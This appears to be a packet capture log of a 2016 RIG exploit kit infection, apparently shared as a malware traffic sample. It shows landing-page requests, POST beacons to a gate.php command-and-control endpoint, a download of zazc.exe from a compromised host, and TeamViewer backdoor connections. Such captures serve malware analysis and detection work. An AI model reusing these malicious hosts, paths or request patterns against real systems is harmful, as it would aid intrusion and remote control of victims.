RIG Exploit Kit EK Delivering a TEAMVIEWER Reverse Shell Backdoor Malware PCAP file download traffic sample

2016-10-21 21:31:29.018549 IP 192.168.1.5.50248 > 192.95.15.211.80: Flags [P.], seq 454:1107, ack 2446, win 16537, length 653: HTTP: GET /index.php?w36KfrmaJR3NA4I=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpOD9UHfYg5D_5qdFeA_3gykx7lHdJhxxxOB6jBZzL8aQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_W5SDx-1g HTTP/1.1
E…oe@………._…H.P!.n..1.gP.@…..GET /index.php?w36KfrmaJR3NA4I=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpOD9UHfYg5D_5qdFeA_3gykx7lHdJhxxxOB6jBZzL8aQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_W5SDx-1g HTTP/1.1
Accept: */*
Referer: http://gl9q.s57ae8vl3.top/?w36KfrmaJR3NA4I=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpOD9UHfYg5D_5qdFeA_3gykx7lHdJhxxxOB6jBZzL8aQFFd
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gl9q.s57ae8vl3.top
Connection: Keep-Alive

2016-10-21 21:31:29.285255 IP 192.95.15.211.80 > 192.168.1.5.50248: Flags [.], ack 1107, win 1162, length 0

E..(o.@….3….._…H.P!.q2.2.[P.@B……….
2016-10-21 21:31:31.440263 IP 192.168.1.5.50248 > 192.95.15.211.80: Flags [P.], seq 1107:1540, ack 79746, win 16450, length 433: HTTP: GET /index.php?w36KfrmaJR3NA4I=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpOD9UHfYg5D_5qdFeA_3gykx7lHdJhxxxOB6jBZzL8aQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K8QT98kKM&dfgsdf=2 HTTP/1.1
E…o.@….{….._…H.P!.q2.2.[P.@B.+..GET /index.php?w36KfrmaJR3NA4I=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpOD9UHfYg5D_5qdFeA_3gykx7lHdJhxxxOB6jBZzL8aQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K8QT98kKM&dfgsdf=2 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: gl9q.s57ae8vl3.top
Connection: Keep-Alive

2016-10-21 21:31:31.633994 IP 192.95.15.211.80 > 192.168.1.5.50248: Flags [.], ack 1540, win 1244, length 0
E..(.%@.7…._…….P.H.2.[!.r.P….n..
2016-10-21 21:31:32.975009 IP 192.95.15.211.80 > 192.168.1.5.50248: Flags [.], seq 79746:81096, ack 1540, win 1244, length 1350: HTTP: HTTP/1.1 200 OK

E..(pJ@….>….l=J-.P.P..\….NP.@………..
2016-10-21 21:31:52.161258 IP 192.168.1.5.50256 > 108.61.74.45.80: Flags [P.], seq 1:344, ack 1, win 16537, length 343: HTTP: POST /a210/gate.php HTTP/1.1
E…pK@………l=J-.P.P..\….NP.@…..POST /a210/gate.php HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Content-Length: 74
Host: evoci.xyz

2016-10-21 21:31:55.561180 IP 192.168.1.5.50257 > 91.218.228.52.80: Flags [P.], seq 1:310, ack 1, win 16537, length 309: HTTP: GET /tseny-na-pilomaterialy-prays/zazc.exe HTTP/1.1
E..]p[@….S….[..4.Q.PD{[..yv.P.@…..GET /tseny-na-pilomaterialy-prays/zazc.exe HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tk-avitek.ru

2016-10-21 21:31:55.917181 IP 91.218.228.52.80 > 192.168.1.5.50257: Flags [.], ack 310, win 123, length 0
E..(.g@.9..|[..4…..P.Q.yv.D{\cP..{….
2016-10-21 21:31:55.919514 IP 91.218.228.52.80 > 192.168.1.5.50257: Flags [.], seq 1:1351, ack 310, win 123, length 1350: HTTP: HTTP/1.1 200 OK

E..(q.@………l=J-.R.P..<B.r..P.@.]………
2016-10-21 21:31:59.295589 IP 192.168.1.5.50258 > 108.61.74.45.80: Flags [P.], seq 1:344, ack 1, win 16537, length 343: HTTP: POST /a210/gate.php HTTP/1.1
E…q.@….+….l=J-.R.P..<B.r..P.@.e…POST /a210/gate.php HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Content-Length: 47
Host: evoci.xyz

2016-10-21 21:31:59.295590 IP 192.168.1.5.50258 > 108.61.74.45.80: Flags [P.], seq 344:391, ack 1, win 16537, length 47: HTTP

E..(q!@….g….l=J-.V.P……..P.@.W}……..
2016-10-21 21:32:01.664843 IP 192.168.1.5.50262 > 108.61.74.45.80: Flags [P.], seq 1:292, ack 1, win 16537, length 291: HTTP: GET /direct/fg_24e90bba.mod HTTP/1.1
E..Kq”@….C….l=J-.V.P……..P.@..S..GET /direct/fg_24e90bba.mod HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: evoci.xyz

2016-10-21 21:32:14.806491 IP 192.168.1.5.50276 > 108.61.74.45.80: Flags [P.], seq 1:344, ack 1, win 16537, length 343: HTTP: POST /a210/gate.php HTTP/1.1
E…su@…
…..l=J-.d.P…….HP.@..+..POST /a210/gate.php HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Content-Length: 46
Host: evoci.xyz

2016-10-21 21:32:14.806492 IP 192.168.1.5.50276 > 108.61.74.45.80: Flags [P.], seq 344:390, ack 1, win 16537, length 46: HTTP

E..(s.@……….i…u.P..O+.KS.P.. g………
2016-10-21 21:33:16.619769 IP 192.168.1.5.50293 > 198.105.254.228.80: Flags [P.], seq 1:601, ack 1, win 64800, length 600: HTTP: POST /forum/contact.php HTTP/1.1
E…s.@….e…..i…u.P..O+.KS.P.. .M..POST /forum/contact.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: dreamscomtrue.site
Content-Length: 368
Connection: Keep-Alive
Cache-Control: no-cache

 

 

  • 37.252.248.78 – TCP Port 5938 – ping3.dyngate.com – TEAMVIEWER COMMUNICATION
  • 178.77.120.100 – TCP Port 5938 – master.dyngate.com – TEAMVIEWER COMMUNICATION
  • 169.54.137.81 – TCP Port 5938 – TEAMVIEWER COMMUNICATION
  • 173.192.194.94 – TCP Port 5938 – TEAMVIEWER COMMUNICATION